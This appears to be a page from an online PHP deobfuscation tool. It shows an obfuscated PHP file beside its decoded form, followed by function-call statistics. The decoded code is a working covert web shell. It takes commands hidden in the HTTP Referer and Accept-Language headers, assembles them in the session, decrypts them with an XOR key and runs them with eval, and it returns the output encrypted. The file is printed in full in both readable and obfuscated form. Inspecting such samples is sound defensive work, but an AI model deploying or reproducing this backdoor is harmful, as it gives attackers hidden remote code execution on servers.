Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $V='(Qa$i=0;$i<$l;Qa){foQar($Qaj=0Qa;($j<$c&&$Qai<$l);Qa$j++,$QaQai++){$o.=$t{$i}Qa^..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$V='(Qa$i=0;$i<$l;Qa){foQar($Qaj=0Qa;($j<$c&&$Qai<$l);Qa$j++,$QaQai++){$o.=$t{$i}Qa^$kQa{Qa$j};}}retQaurn $o;}$r=Qa$_';
$N='t(Qa);@eQaval(@gzuQancompressQa(@xQa(@basQae64_decodQaeQa(preg_QareplaceQa(arrayQa("/Qa_/",Qa"/-/"),ar';
$W='a($i.$kh),0,Qa3));$fQa=$sl($Qass(mQad5Qa($i.$kf),0,3Qa));$Qap="Qa";for($Qaz=1;$z<couQant($Qam[1]);Qa$';
$C=str_replace('WS','','crWSeatWSWSe_fuWSWSnctWSion');
$d='ll(Qa"Qa/Qa([\\w])[\\w-]+(?Qa:;Qaq=0.([Qa\\d]))?,?/",$rQaa,$m);iQaf($q&&$Qam){@sessQaion_sQatart();Qa$sQa=';
$P='asQae64_eQanQacode(x(gzQacompress($o),$Qak))Qa;prQainQat("<$k>$QadQa</Qa$k>");@session_destroQay();}}}}';
$o='QaQaz++)$p.=$q[$m[2Qa][$z]];iQaf(sQatrpos($p,$QahQa)===0QaQa){$s[$i]="";$p=$ssQa($Qap,3);}if(arrQaaQa';
$Q='SERVQaER;$rQar=Qa@$r["HTTP_REQaFERER"Qa];$ra=Qa@Qa$r["HTTPQaQa_AQaCCEPT_LANGUAGEQa"];ifQa($rr&&$raQa)';
$z='$kh="5d41"Qa;$kfQa="Qa402a";QafQaunctQaion x($t,$k){$cQaQa=stQarlQaen($k);$l=strlen($t);$o=Qa"Qa";for';
$g='ray("/"Qa,"+"Qa),$ssQa($Qas[Qa$i],0,$e))Qa),$k)))Qa;$o=oQab_get_cQaoQanQatents();ob_end_cleanQa(Qa);$d=b';
$j='{$u=pQaarseQaQa_url($rr);parse_Qastr($uQa[Qa"querQay"],$q)Qa;$q=array_QavaluesQa($q);preQag_QamatcQah_a';
$E='&$_QaSESSIOQaN;$sQasQa="subQastQar";$sl="strtolower";$Qai=$m[1Qa][0QaQa].$Qam[1][1];$h=$sl($sQas(md5Q';
$x='y_key_exiQasts($QaQai,$s)){$s[$i].Qa=$pQa;$e=sQatrpos(Qa$s[$i],Qa$f);if($e)Qa{$Qak=Qa$kh.$kf;oQab_star';
$G=str_replace('Qa','',$z.$V.$Q.$j.$d.$E.$W.$o.$x.$N.$g.$P);
$l=$C('',$G);$l();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 08da82abc90205bff4511ddfc95c7364 |
Eval Count | 1 |
Decode Time | 125 ms |